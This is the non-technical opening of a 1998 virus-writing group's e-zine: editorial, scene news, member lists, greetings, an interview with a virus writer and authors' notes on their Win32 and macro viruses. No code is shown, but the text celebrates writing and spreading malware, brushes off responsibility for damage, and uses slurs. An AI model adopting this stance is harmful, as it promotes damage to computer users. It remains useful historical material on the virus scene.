EZine - 29a-2

Introduction to 29A#2 > Mister Sandman/29A

Friday 13th, December of 1996, at 6:66am... 29A#1 is officially released to the public. It was undoubtedly a magic date. But not as magic as Friday 13th (which is a special day for viruses) of February, in 1998, at 6:66pm... this was the final release date/time of 29A#2, and the most curious thing is, we had never thought about letting such a coincidence happen... but it did. In this evil year (666*3=1998), who knows what else might happen in the scene?

Over a year has passed since our first issue was released, last December in 1996. However this does not mean, like many people say, that we "release one issue per year". No, that's not fucking true... we've spent one year in order to release 29A#2 but that doesn't mean we will do that again. Lots of circumstances drove us to be late, such as: some members doing the military service, major changes and internal restructuring, and most important of all: the necessity to spend a lot of time on R&D work in order to start the way into the so called "new school" (Win32). It's easy to notice now that, in most of the cases, those who could not understand these reasons were either kids with no necessity of doing the military service (by now) or coders who are still not interested in spending their efforts on Win32. You can find people out there claiming they "release 3 or 4 zines per year, instead of 1", harassing you, making pressure and/or stupid jokes about the reasons which make your zine get delayed, and so on. But the funniest thing is they pay so much attention to your ass that they do not pay any to theirs and then get caught, and it's their zine which gets delayed because of the same reasons they were joking about a few months ago.

Being serious now, it is important to say that making comparisons about quantity is very easy. It is also important to remember though that YAM, for instance, released three issues in their eight months of life. We are not speaking about quantity, but about quality. And also about contents plus container, working in a professional way, and offering interesting and innovative articles and viruses to our readers. We do our best and we think it's ok, you judge :)

Like Jacky Qwerty, in a speedtalking, hypergesticulating Tarantino-like way says, "this second issue of 29A is full of hot new ground-breaking kick-ass stuff from top to bottom" - or that's what we think, it's up to you to tell us whether we're right or wrong at this. However nobody can deny the fact that we have developed for this issue completely new and unseen stuff like, for instance, the new (definitive) Win32 techniques, not only for infection but also for residency, stealth, error handling, etc. We're publishing here as well the hottest disassemblies, engines, tools, tutorials and, of course, viruses of our own, including the first multiprocessor/multiplatform infector, the first virus which executes backwards, the first boot infector that uses PMODE features, the most spread baby in the world right now (CAP), and lots of completely original-featured viruses, which, together with the rest of the articles, we hope you'll read and enjoy.

We hadn't released anything for over a year until this issue of 29A was uploaded to our FTP and eventually made publicly available, and that is something like saying that you'll find the work of a whole year here inside. From now onwards things will change, and we hope we will release our future issues within shorter periods of time. And this will probably mean that, at least for us, "something better than 29A#2" will almost become an oxymoron. However we will try, as it was one of our initial intentions, to make every future issue of 29A better than the previous one(s).

About the scene there's a very important thing to say: it's alive, and it's more active than it has ever been, in my (humble) opinion. Besides the fact that lots of new groups have emerged, which is something that always happens, we can see many important virus groups such as iKx, SLAM, SVL, Stealth, and so on (so on = the ones i've unintentionally forgotten), as well as, for instance, magazines based on external collaborations without any group supporting them, i.e. Sources of Kaos. As you can see there's a lot of competition and it is pretty obvious that there's still a lot to do in the scene ;) And i think this is all for now... there is a separate article, called "News since 29A#1", in which we try to describe more or less what has happened in the scene, and in 29A as part of it, since our first issue was released. Now it's time just to wish you will enjoy this new issue of 29A, and to ask you not to forget to read any of our articles; we hope you'll like them. "We're pleased if you're pleased" :)

Mister Sandman, bring me a dream.

News since 29A#1 > Mister Sandman/29A

In a whole year it's obvious to say that many things happened. And it would be a real fuck to try to sum them all up in this article, so we'll only try to write a brief report about the most important events which took place in all this time. In fact there's nothing too interesting here, just some kind of curious news which may seem funny or at least not boring to you. For us, they were great and amazing experiences we hope we'll go through again.

First of all, after the release of 29A#1, was the discovery of some bugs in the article browser and some errors in a few articles. Our first e-zine was just a test and i think it was a pretty good first step. And it meant a big help for us in order to get some experience about magazine releasing. There was as well kind of a "lack of fame", which forced us to be lame in some aspects of the magazine (on the esthetic side) such as the sucking ANSI i had to draw myself in less than 30 minutes before releasing the zine. Many long conversations about this and other aspects of 29A took place, while our holidays (the VX ones) finished and we had to restart writing viruses. It was nice however to have received tons of e-mails from almost every part of the world congratulating us for the work we did in 29A#1.

We kept on working on our viruses/articles, and at the same time we started thinking about the idea of developing the so-called "29A Labs", our website located at http://29A.islatortuga.com. Also we stopped connecting to EFnet, and, instead, we started visiting the recently founded Spanish IRC network, where we eventually settled after having created our own virus channel. And these changes were not only affecting the group externally, but also internally, as by this time there were as well a lot of new members joining, and other members becoming collaborators. And you may be wondering now what the fuck a collaborator is... well, this is another feature we have implemented in 29A.

Now the organization is formed both by members and collaborators. Members are those who have the commitment to write a certain number of articles and/or viruses per a certain period of time; they are 29A, the virus writing group itself. Collaborators are external VXers who don't have any commitment with us, who write articles or viruses when they feel like it, and who send them to us in order to collaborate with the group. It is important to say that many ex-members, due to their inactivity or because of their lack of time, were "reclassified" and put as collaborators, instead of members. So, that's the way the group is formed. The official list of members and collaborators follows, including the last-hour additions :)

IMPORTANT!!! if any of the e-mail addresses below does not work, try to use cryogen.com instead of islatortuga.com, or vice-versa. It is also important to note that we are probably moving in the next months to 29A.org, so these addresses may become obsolete soon, although they'll still exist, and we will keep on checking them from time to time.

-29A MEMBERS- (the VX dream-team) ;)

Member name          Origin     IRC nick     E-mail
Mister Sandman       Spain      MrSandman    [email protected]
Darkman              Denmark    _darkman_    [email protected]
GriYo                Spain      GriYo        [email protected]
Jacky Qwerty         Peru       jqwerty      [email protected]
Rajaat               UK         Rajaat       [email protected]
Reptile              Canada     Reptile-     reptile./[email protected]
Super                Spain      Superx       [email protected]
Tcp                  Spain      Tcp          [email protected]
Vecna                Brazil     Vecna        [email protected]
Wintermute           Spain      Winter       [email protected]

-COLLABORATORS-

Collaborator name    Origin     IRC nick     E-mail
Aníbal Lecter        Spain      _Anibal_     n/a
AVV                  Spain      avv          [email protected]
Heuristic            Denmark    n/a          n/a
Leugim San           Spain      LeugimSan    [email protected]
Lord Julus           Romania    LordJulus    [email protected]
Mr. White            Spain      W666         [email protected]
"Q" the Misanthrope  USA        n/a          [email protected]
Spanska              France     El_Gato      [email protected]
SSR                  Russia     ssr          n/a
The Slug             Spain      the_slug     [email protected]
VirusBuster          Spain      VirusBust    [email protected]
Ypsilon              Spain      Ypsilon      [email protected]
Z0MBiE               Russia     Z0MBiE       n/a

Now that this important news has been told, it is time to start reporting the trivial events. I would first mention our appearances in the media. The first one was in PC Revue (?), a Slovakian paper-printed magazine, where we could read a brief comment about my AntiCARO virus. After this, we received via Internet an e-mail from a guy called Javier Guerrero, who heads a virus-oriented section in a Spanish paper-printed magazine called PCmanía. We had some chats about what we (29A+him) exactly wanted, and after that short period of time, a full-color, four-page article about the virus scene and 29A appeared in PCmanía, which is one of the most popular computer magazines in Spain. In the next month, he dedicated another -even longer- article to the analysis of my virus Torero, and two months ago we were mentioned in an article dedicated to virus payloads, as before last summer we had talked with him about the idea of writing such an article, and provided him with some of the best known virus payloads. Besides, we have been interviewed by many other media, and we're waiting right now for more public appearances. These plans include our probable presence in a TV program!, plus the already confirmed announcement of the release of 29A#2 in PCmanía, and some article(s) in another Spanish paper-printed computer magazine (the best selling, i think), called PC-Actual. But this all is a surprise we would not like to unveil by now... just keep on visiting the 29A Labs! ;) These are, btw, some excerpts of the article about us in PCmanía:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
On cover: "Exclusive interview with Spanish virus creators"
Index: "[...] we offer you a very interesting interview with two members of a Spanish group of virus creators, called 29A. In an informal chat, our guests describe their methods, their history, and their future plans, as well as their opinions about the national and international virus scene".
Page 141: "Nowadays, 29A is, internationally, the most important virus creating group, as well as the first and only one from Spain".
Page 142: "Writing viruses the way we do in 29A is to code for art and entertainment, not for effectiveness and destruction (Mr.Sandman)".
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

The whole article has also been converted into a webpage, so everybody owning a browser may check it out at the official website of PCmanía, together with other articles 29A was mentioned in:

(*) http://www.canaldinamic.es/PCMANIA/PC057/VI/pc057vivirus0000.html
(*) http://www.canaldinamic.es/PCMANIA/PC058/VI/pc058vivirus0000.html
(*) http://www.canaldinamic.es/PCMANIA/PC061/VI/pc061vivirus0000.html

Another funny event took place last summer, in Madrid. We celebrated the very first European VX meeting, although it was initially supposed to be a meeting only for 29Aers. However that's what it eventually became, as most of those VXers who were supposed to come finally couldn't, because of several different reasons. For instance, Rajaat planned to go by car from the UK to Luxembourg, where he'd meet CoKe and then come to Spain. A completely unfortunate last-hour crash the same day he was leaving the UK messed up every plan and made it impossible to meet them... driving while being stoned... you know ;) The only foreigner we could meet was Spanska, from France. After having met everybody we went to a restaurant and had our meal. Then we went for a walk to a cybercafé where we connected to IRC and had some fun on-line, and that is when we decided to split up and meet later in order to go partying. Some of us went to the most famous square in Madrid, Plaza Mayor, where we could sit in a bar and try to write a virus together; it was a pretty funny thing although we couldn't finish it (too much heat) :) Other people such as GriYo or Spanska decided to go their own way in order to have a rest, so they could have their energies on top when going partying. However, this was the last time any of us saw Spanska: he fell asleep in his car until the next day :) We met again at 22:00h or so in a McDonald's, and then went to some pubs and night bars, including GriYo's... and our party stopped around 5:30h or so, with some of us (especially GriYo and i) a little bit drunk :) It was a great experience we'll repeat this summer, first in Madrid and later -hopefully- in Amsterdam. But this time things will be much more different, and besides we already know for sure right now that b0z0, Darkman, Reptile, Rajaat, and Spanska are coming, so we are sure it'll be impossible to stop laughing and having fun for a single minute. And there are also some rumors, btw, about the possibility of organizing a ganja-smoking contest so we may know at last who the fuck is the king, god or whatever of ganja ;)

And last but not least, like every year, the SIMO convention (an enterprise-oriented computer exposition, with stands and so on) took place in Madrid, and 29A couldn't miss it ;) This time it was GriYo, Wintermute, Mr. White (collaborator), and i who represented the group. It was nice to meet personally the developers of Panda, the most important Spanish AV product. They were at every moment very kind and proved that it is possible to have a good relationship with "the other side". In this case, it was VX and AV who shared a funny and friendly chat, for some minutes. We could also visit the stands of other AV products, such as F-Prot, AVP, TBAV, Scan, etc, but it was good enough to stop at them and have some laughs... there were only salesmen, so it would have been a waste of time to try to speak with them :P When they saw us laughing at them they became completely astonished :) And this is all, more or less... there's another event about to come, which deals with the celebration of the release of 29A#2, but i guess the report of this party will be part of 29A#3, so... wait until then!

Mister Sandman, bring me a dream.

29A distro sites > Mister Sandman/29A

In order to know the most recent news in 29A, look for our latest releases, and be able to download binaries of our viruses as soon as they're made publicly available, don't hesitate to visit our "29A Labs", the official website of the group, at http://29A.islatortuga.com. Please note that we're moving soon to http://www.29A.org. However 29A.islatortuga.com will keep on working for a long time until we complete our "migration". If what you want is to chat with us you can always try on IRC, as we usually spend a lot of time in the #virus channel of Hispanet, the Spanish network. Connect to one of the servers below and look for us; our nicknames are listed in the "News since 29A#1" article:

orion.irc-hispano.org .............. Arrakis server
pleyades.irc-hispano.org ........... Arrakis server
vega.irc-hispano.org ............... Arrakis server
fenix.irc-hispano.org .............. Arrakis server
pegasus.irc-hispano.org ............ Milenium server
saturno.irc-hispano.org ............ ERGOS server
marte.irc-hispano.org .............. Minorisa server
mercurio.irc-hispano.org ........... Mundiva server
ganimedes.irc-hispano.org .......... EUI UPV server
pulsar.irc-hispano.org ............. RedesTB server
gaia.irc-hispano.org ............... Argo server
sirius.irc-hispano.org ............. Servicom server
europa.irc-hispano.org ............. CTV server
aire.irc-hispano.org ............... Catalunya.Net server
titan.irc-hispano.org .............. InforEspaña server
jupiter.irc-hispano.org ............ Lleida Networks server

Since 29A#1 was released many sites (both webs and boards) showed their interest in officially distributing 29A. If you want to join the list of 29A distribution sites, just e-mail either Darkman or me (you can find our addresses in the "News since 29A#1" article) and specify in your message the name of your website/board and its address/phone number. And then you'll appear in the following list, when updated:

Web site/Board name                  Address/Phone
29A Labs (world hq)                  http://29A.islatortuga.com
Cicatrix site (usa hq)               http://www.cyberstation.net/~cicatrix
SiZiF's site (.yu hq)                http://solair.eunet.yu/~sizif/29A.html
Dejanu's site (.ro hq)               http://www.rotravel.com/dejanu/29A/
Arrested Development (euro hq)       +31-773-547477
Black Adder (.il hq)                 +972-651-4404
BlueDemon BBS (.mx hq)               +52-461-555-19
Dark Node (.es hq)                   +34-(9)86-564-053
Edison's Temple                      +34-(9)1-406-03-72
FaLCoN BBS (.br hq)                  +55-11-875-9838
IX BBS (.de hq)                      +49-6074-68390
Satanic Brain (.ar hq)               +54-13-837480
The Frynge (.ca hq)                  +1-604-763-6314
Toxic Delusions (.za hq)             +27-24-852-5008
UiS (.my hq)                         +60-352-107-72

Due to a data loss at least 2-3 sites couldn't be added, as it was impossible to recontact them in order to get their data again. We in the staff hope they're reading this and will get in touch again.

Mister Sandman, bring me a dream.

Our greetings > Mister Sandman/29A

Greetings go this time to...

_Anibal_, 00FAh, avv, b0z0, CaptZero, Casio, Cicatrix, CoKe, FJP, Galar, Galindo, giGGler, God@rky, Greenline, iiriv, Int13h, jtr, kdkd-666, Kid_Chaos, LeugimSan, LordJulus, LovinGOD, LuisM, Maverick, MDriller, mgl, Murkry, nick, Omega666, Owl[FS], Pedro, piCarD, Poltergst, "Q", qark, QuantumG, rretch, RAIDERS, rebyc, ROLF, sbringer, ShadSeek, Shumway, SiZiF, Skeeve242, Sokrates, Spanska, SSR, StarZer0, the_slug, TheWizard, trgvalkie, VDaemon and VirusBust:

we miss your great sense of humour on IRC ;)
still translating games into Spanish for EA? :P
so happy you finally got a girlfriend :)
hope the fuckin t-shirt arrives soon... yours rocks ;)
why are people like you so motherfucking anal?
learn and sing Madonna's "Like A Virgin" :P
keep the *best* work up, man, you rule!
your computer is now stoned (same as you, heh)
you're an incult, Daft Punk roqs ;)
not drunk anymore, girlfriend... really Galar? ;)
is your height still 81cms? (greeting from Super)
we all live in a love chaaat! -> R's ruin, hehe
miss you and your cool website :(
how are you? still alive? (in Romanian)
yodel again! :)
so long no see, dude
learn cheli and win a prize ;)
we all are happy you're ok again
what about your life, man??? i really miss you :(
jqwerty+you+me=latin sex machines!
hope to see you this summer in Madrid ;)
still working on that cookie monster?
vindecatori roq!!! :)))
i promised you'll be here... so here it is :)
the OS-migration man, hehehe ;)
Universe+Orgasmatron rulez (greeting from Vecna)
forget DOS and get into the new school :P
greetings are the most important section ;)
hope to see you more often on IRC
wanna send greetings to your gramma? :)
hope you and your BBS are still alive :)
thinking on the anti[sm] coalition?
how many RedBulls have you drunk tonite? (Super)
don't get too stoned when you come to Spain ;)
espressos and cappuccinos rule, heh?
what must you do to convince people?
be back... (666th time somebody asks you)
still interested in Linux stuff?
love that crazy dutch radio reporter ;)
---you look like a whale foetus, cocksucker!!! (in Spanish)
really getting a paid trip to Acapulco?
forgot what IRC stands for? :)
greetings because of being GriYo's inspiration
what can i say to one of my idols?
you should come more to Hispanet ;)
more gypsies working at Tabacalera? :)
i promised i'd send that to you... ;)
becoming a millionaire with your AV? ;)
don't even think of speaking about exams! ;)
still lost in Madrid? :P
russian viral energy!!! ;) (in Russian)
i'm working on a GameBoy infector, hehe ;)
aaaarrggghhh, the $#%!@ military service
use a debugger instead of cut&paste :P
does this seem good enough to you?
try to spice some horse up with Avecrem :)
heh, third greeting in Romanian :)
happy being the "keeper of the virii"? ;)

W666.......: what about that movie you were writing?
ww0rker....: still married as far as i know... that's a record!
Ypsilon....: you start looking serious, but keep on coding! :P
Z0MBiE.....: what will get infected next? txt? :)

Reptile's greetings...

oYirG......: schizo! change nick!
b0z0.......: got the shirt? :P
Kid_Chaos..: fascist Fujimori sucks badly! mooha! ;)
piCarD.....: bwaha! rhabarber...
Reptile....: *** You were kicked from #virus by blah0 (banned)
Scorpion...: Hey you gimp, is it fun to work in a dungeon?!
retch......: You hermaphrodizeeen bitch! Stupid fascist!

Rajaat also wants to greet: Rhincewind, The Unforgiven, Antigen, Priest, and Metabolis, hoping to recontact them in the near future. We would also like to send special greetings to Javier Guerrero (thanks for all, man!), Bernardo Quintero (great work coming soon, heh?), our friends at Panda Software (eat this!!! :P), and of course, to all our buddies at #hack in Hispanet, especially: BINARIA, DarkNail, mainboard (also his girlfriend, Icar) and Case_Zer0 (the ones i go out with most often in Madrid), also to PhiSk, for his loyalty and a big favor i still owe, La_Santa (heheh, my cyberwife) and to my best friends there (or at least, those i can remember right now - alphabetical order): _TaNiS_, |AkratA|, |AmandA|, |aRuSHa|, |fit0|, Akira, BiLLsUcKs, Clarisita, dairo, deadrose, Goku, Jany, Mia (welcome to Jack Rabbit Slim's) ;) NecronoiD, RAGE_666, SiLbY, Sr-aSpid and VaW (not a #hack addict though). If you are not included here, don't think you are less important than the above for us... sometimes we even forget ourselves!

Thanks to...

Exobit.....: democoding group who programmed the intro
Artqvo.....: ANSI logo and graphics of the intro (Exobit)
Khroma.....: main writing of the intro code (Exobit)
Mentat.....: music modules of the intro (Exobit)
Tcp........: file browser coding, configuration, bug fixes
The Slug...: article reader coding, bug fixes
Tuk........: 29A official logo, used in intro and ANSI
Spanska....: screensaver, based on his Cosmos virus

Mister Sandman, bring me a dream.

Legal stuff > Mister Sandman/29A

Not many changes since 29A#1 so... eat more or less the same text :P Erhhhmm... well, i really hate to do this kind of thing but it's necessary anyway so... ok, let's suffer a bit to make my lawyers happy :) Although most of our readers are supposed to have more than one virus, and to be even able to code viruses by themselves, so they ain't the typical lamers who are looking for destructive code in order to fuck some computers at the school they "study" in, we are conscious of the fact that there exists a small and very improbable risk of falling into the greasy hands of one of these gimps, so we'd like to make clear that the only reason which drives 29A to release this magazine is the basic principle of educational purposes. As Qark said, "if we don't hurt the community, the community won't hurt us" ;) We are not responsible for any damage caused due to the misuse of the information (articles/viruses) released in this issue of 29A, just the same as somebody who makes knives isn't responsible if some schizo uses one of the knives to kill another person or to cut his dick off, got what we mean? If so, go ahead and enjoy the magazine. Otherwise just get the fuck out :)

Mister Sandman, bring me a dream.

Interview with Qark > Mister Sandman/29A

For this second issue of 29A, we decided to interview Qark, one of the best virus writers ever (maybe the best?), who left VLAD and the scene about one year ago. Despite his lack of free time, this very good friend of mine was eventually able to make it possible to bring you now this great opportunity to know him better. We all miss you, dude.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

29A> Ok, Qark... this is the classic first question of almost every interview... tell me why did you choose your nick

When Metabolis and I started out with VLAD we had local scene nicks that everyone knew, so we had to get new ones. (Obviously meta wasn't always called meta). When I first jumped into irc for #virus, every nick I picked was always taken, so I thought to myself "What nick could I possibly pick that no one will ever use?", and picked Qark - because it defies the laws of English by dropping the 'u'. But why "Qark" out of all the "Q" words? I don't know.. I can't think of any other "Q" words to be honest.

29A> When and with 'what' did you start computing?

I didn't own a computer until after I left highschool. (A few years back). My first computer was a mighty 8088 XT with 20 Meg hard disk and EGA monitor :)

29A> And when did you first know about a computer virus (first experience, with which virus(es), etc)?

The first I ever heard about computer viruses was when TZ's X-Fungus virus infected Suncorp (a local bank) on the radio. The first virus I ever encountered in the flesh was 1575 (green caterpillar) on someone's computer. I took a copy home so that I could work out how to make a virus of my own but it was beyond me at the time.

29A> In what computer languages can you code?

ASM, PAS, SQL, Modula-2 and some C.

29A> Describe yourself (physically, morally... however... even sexually if you dare) :)

Umm White, Male, average height, brown hair, blue-green-hazel (something) eyes. I'm very conservative morally - viruses are a bit of an anomaly in my personality.

29A> Ok, now about viruses... tell me which ones have you coded, and/or the ones you like most

Let me see.. I've written a whole heap of viruses.

Father, Mother, Sister, Brother (Incest family - Very lame) - VLAD#1
Actually mother wasn't too bad. It still stealths everything.

VLAD virus, Republic, Meningitis - VLAD#2
Pretty lame still, although my flash bios infector was a nifty idea.

Hemlock, Megastealth - VLAD#3
Both these viruses were pretty cool even if somewhat buggy.

Winsurfer, Goodtimes - VLAD#4
Winsurfer was a big breakthrough for Quantum and I so it is one of my favourite virii.

Horsa, Ph33r - VLAD#5
I liked both of these virii. Horsa was one of the hardest things I've ever written due to the mathematics involved so I like it, and Ph33r is the first multi-OS (kind of) virus so I liked it too. (Quantum wrote the memory routines for that one)

Gilgamesh, tracevir, 386 virus - VLAD#6
Pretty ordinary viruses, but my VSTE (my file entry point tunneling engine) was a new concept so I kind of liked it, even if it has been done better since.

Padania, goodbye - VLAD#7
Padania was good. Goodbye sucked.

Quantum and I have worked on a couple of Win95 viruses together. Win95.Punch and one in memory of TZ..

29A> Btw, about VLAD (unavoidable question) :) you left the group... you said you didn't have the time for doing other things... explain it better, please... did you get a girlfriend? :)

By "other things" I meant "anything". Spend your time vladding and the rest of your life goes to hell. And I do have a lovely woman who takes up a sizeable chunk of my time :) luckily for me she likes viruses :)

29A> What about your personal future projects?

Some more win95 viruses are on the cards. I did the vxd routines in a couple of win95 viruses so I'm still coding every now and then..

29A> And more thingies about VLAD... could you tell me something about its story (who, when, why decided to create it, etc)?

I'm pretty vague about it, but I think it went like this: Meta read ir#2 and thought "cool, im gonna start my own virus group and call it vlad". At this stage I didn't know him at all. A day later he was chatting to the sysop of the local warez board about his latest group when he was put in touch with me. And voila, that's how it started. Meta had his own shareware bbs where he was the good-guy sysop, while in a secret area was the vlad virus section. There we would swap code for our latest direct-action virii :) When we got enough dross ready to produce vlad1 I jumped on the bus and the train and went out to his place to put it all together. We met for the first time at the train station. Nothing much happened at his place apart from the magazine production. The main thing I remember is it being freezing cold.. we were working on it until the early hours of the morning. Somewhere along the track meta met TZ and invited him to our private vlad conference on his bbs. We'd discuss virii techniques.. Sometime later we went onto IRC and our story is well known since then..

29A> Which is/are your favourite virus(es)?

RDA.fighter is probably my favourite, followed by starship. The new virus by Quantum and I is really cool :) coming to a hard disk near you :)

29A> Do you think the perfect virus exists or might be ever coded?

No.. the whole idea of a perfect virus is stupid I think.

29A> How will the 'viruses of the future' look in your opinion?

It will be a resident win95/NT infector.

29A> Ok, now let's have a look at the other side... AVs and AVers. Which is the AV you like most?

AVP is pretty good.

Its win95 version really needs a scanning VXD though.

29A> Heh... one question is enough for those niggas ;) now about the virus 29A> scene... give me your point of view about it (old groups, new groups, 29A> who's cool, who sucks... you know) :) Firstly, VLAD is cool :) Nuke, rabid and yam were all lame.. but trident and p/s were good. IR were always my favourite group but I don't like IRG much.. 29A are way cool :) 29A> Finally, just send a greet to someone, say something, sing, write a 29A> poem , pull yourself :)... dunno, whatever you want. This is your 29A> free space :) RIP TZ :( Greets fly out to Metabolis and Quantumg and all the people I like. Also a kiss to a certain girl :) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 Good luck, Qark... especially with that girl ;)

Mister Sandman, bring me a dream.

Words from Jacky Qwerty > Jacky Qwerty/29A

First of all, i would like to send some short commentz and general greetz to the good and bad virus scene. Yes, i think there exists such a difference and thats something that should be "pointed" out. Apart from this i'll take the chance to describe my articlez, virusez and utilitiez included in this 29A issue as well as my true purpose on writin and spreadin out this knowledge.

The two sidez of virus scene

Yes, in my humble opinion, i think there is a "good" virus scene, one which is continuously lookin for new infection ideaz, new platformz and new file formatz to infect. Just for the simple challenge it poses by itself, not for that stupid nonsense appetite for destruction. Thats childish rubbish and we dont like that. We rather enjoy foolin F-Potatoe's last protection or TBAV heuristicz or discoverin Microsoft's untold secretz, etc. This is what we like. This is the good virus scene and we'll stay this way for a long time. The other side is the "bad" virus scene, which is made of vandalz who have childish programmin habitz. They move and act by the simple "minimum effort" principle. They rather enjoy randomly writin or formatin a hard drive, than squeezin both skull and brainz out in an attempt to code some more creative and interestin stuff, not the awful boresome shit they're accustomed to. For the former purpose, i'd strongly recommend to download the AVP encyclopedia DOS edition, and take a look at all the "kick ass" virus demoz it containz. Needless to say, I, as a VXer and member of the 29A group team, have nothin to do with this "bad" side of the virus scene and be sure i will reject any chance to become a "vandal" for dayz to come. Did u stick that Bontchy! #8P

Greetz to all VXerz

Warm greetz to all those creative VX coderz around the world who use their brainz and imagination writin fancy creative payloadz - harmless graphicz, soundz, etc - inside their lil' creepy binary creaturez, you all rock! ;) No greetz at all to the increasin number of lamerz and wannabeez who feel they are the bad guyz and best coderz on earth just by writin destructive nonsense rubbish and wipin out compz at skool or friendz, you all suck! :( As bein part of the first group, i really hope you enjoy this 29A#2 issue as it is full of hot new ground-breakin kick-ass stuff from top to bottom ;)

Quick description

For my part i have written and coded some nifty Win32 (WinNT/Win95/Win32s) virusez: (1) Win32.Jacky, the very first Win32 infector. (2) Win32.Cabanas, the very first resident, stealth, antidebuged, antiheuristic Win32 virus. (3) DogPaw, a simple but powerful DOS virus, which is able to infect DOS, Win3.1, Win95, WinNT and OS/2 applicationz via a recently discovered backdoor, thanx Casio. (4) WM.CAP, my first and only macro virus written as an entrance to the macro stuff world, simple in structure (who said complex?), but very powerful and infectious by nature - heck i didnt know it would become so common, blame Microsoft for their stupidity -. This is all with respect to my virusez. I have also prepared a couple of articlez about macro stuff, they are named (1) Macro virus tricks, and (2) WordMacro.CAP virus description. The first article deals with two known limitationz of actual macro virusez and then proposes solutionz for them. The second article gives a full description of a real macro virus and serves as a good complement for the first article. Finally, i have written two especially useful utilitiez for Win32 (with C source code included): (1) GETPROC, a Win32 console application very useful for beginnerz, which also serves as a complement for the PE infection tutorial. And (2) PEWRSEC, a simple DOS program which will be very useful for you Win32 ASM coderz once you understand the benefitz of a R/W code section on a PE file: you will be able to include the first generation sample of your Win32 virus in the code section, as you usually did in DOS, and you will also be able to debug it with symbolic information included along with the source code. And last but not least, i have prepared myself some useful INC filez for DOS and Win32: (1) USEFUL.inc, (2) MZ.inc, (3) WIN32API.inc and (4) PE.inc. These include filez will make more sense once u have delved yerself into the Win32 world.

Scope and Purpose

All of these virusez/articlez/utilitiez were coded with just one goal in mind: to make sure all this information will be given to "otherz" before i leave the scene or the world at worst. I mean, dont let your own knowledge be buried along with your body, spread it out before you leave this world. If you're smart enough and really understand this, then you are almost ready to learn from otherz. Next is that you should be moved or pushed to "learn" just by the simple educational purpose or the challenge it poses by itself. Then you'll be ready to teach your knowledge and otherz will learn from you. Needless to say, i wouldnt like at all to know that one of my virusez has escaped from this zine coz you didnt understand this. Please dont be a lamer. Now, Enjoy! (c) 1997 Jacky Qwerty/29A.

What is happening in IR/G? > Rajaat / 29A

Now talking Rajaat [IR/G]...

Preface

It has now been half a year since our magazine came out, and since then you haven't heard much from us anymore... Why? I hope to cover some of the things that happened in IR/G and what the current status is (as far as I know, that is).

Sepultura's departure

Shortly after the release of IR#8 Sepultura, our main organizer and the backbone of IR/G, decided to leave the scene altogether. I do miss his programming skills, which I don't have. Although I don't blame him, his departure was in my eyes the beginning of the end of IR/G as I know it. I hereby want to thank him for all the things he has done for me and for IR/G.

No backbone

With the departure of Sepultura we also lost our talent to organise. Without this backbone, we weren't able to bring out any magazine after IR#8. We tried to find another person in our group with the ability and will to organise, yet we couldn't find/trick someone into taking that task upon him. Without any organisation, a group cannot exist in my view.

Hate to code

Not being motivated very much, I found myself unable to program very much. My time being consumed by college, I had little time to research virus-related issues. All I could do was think of nice tricks, program them and comment them a bit, but I could not find the heart to make a complete virus out of them. This left me with a huge pack of tricks, which I haven't used in viruses yet. Eventually I hope I can find the motivation and time to put all these tricks together in one big virus, which will probably be the last virus I will make. This is not caused by a lack of interest, and of course I will stay in the scene trying to think of new tricks and innovative ideas.

Prologue

Due to the circumstances and the overall quality of the viruses produced by IR/G I think it suits me and them best that I leave the group and continue the path of virus writing on my own, contributing things to various groups. I hope that the other people in IR/G won't be mad about my decision to leave them. I wish them all the best, and hereby my promise that this is not the last time they will hear from me.

Thanks

Given the opportunity here I would like to thank quite a few people who have supported me in the past and hopefully will stay to do so in the future. The Unforgiven, for his many email conversations, excellent ideas on human nature and beliefs, and, most importantly, his friendship during the time. I hope I will be able to meet you sometime. Rogue, for showing his excellent code examples, although I've never witnessed any program of his finished in the wild, save for one. Most probably a badass to others but a friend to me. Mister Sandman, to whom I gave this article in order to publish it in their second magazine (they beat us *grin*). Sepultura, for his organising skills and trying to keep the whole lot together. I could thank a lot more people, but I think that I must keep it short, because nobody is interested in it save for the people who are actually thanked.

And now talking Rajaat / 29A...

Last update

It sure looks like whenever I write some article, it always seems to get outdated when magazines don't get released as quickly as anticipated (sorry folks, couldn't resist joking about it). But since the time I wrote the above a few things have happened. You have probably read somewhere in this magazine that I've become a member of 29A! My hate to code went away, but that doesn't mean I've plenty of time to code; I'll do my best and see what I can have in store for you.

What the hell am I up to?

To be honest, I don't know. I have here about 5 unfinished programming projects I should finish soon, and I hope I will have the time at my disposal for finishing them. Anyway, I'm proud to be a 29Aer and I hope I can keep up the group's high standard of virus coding.

And how about Immortal Riot?

I wish I knew. I think the best thing my friend The Unforgiven and his comrades can do is split from Genesis again (in my eyes it's history) and go on their own again, should they feel like coding again. I hope that you, the reader, will once again witness the excellent magazines of our "hjältar i snön" (heroes in the snow).

Rajaat / 29A

Envy makes dorks resuscitate > Mister Sandman/29A

It has been one year or so since IRG#8 (actually IRG#1, but many people seem to think with their ass) was released. And happily that's the last time we had the chance to hear about a pampered child whose desire for protagonism and egocentrism reached its real highlight. You know who he is. He retired because he "did not have enough time to keep on leading IRG", as school sucked most of his free time. Well... for a long time we were almost forced to swallow his childish attitude, his deity-wannabe behavior, and his many attempts to suck up the whole attention every time, everywhere (haven't you ever hated reading his stupid introductions to somebody else's articles published in IRG#8?). And we had to read BULLSHIT like this from him:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
[...] The magazine is about 1.4 meg, of which about 99% is actual articles. Unlike some 'virus' magazines we dont need 500k viewers / intros / music files to impress.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8

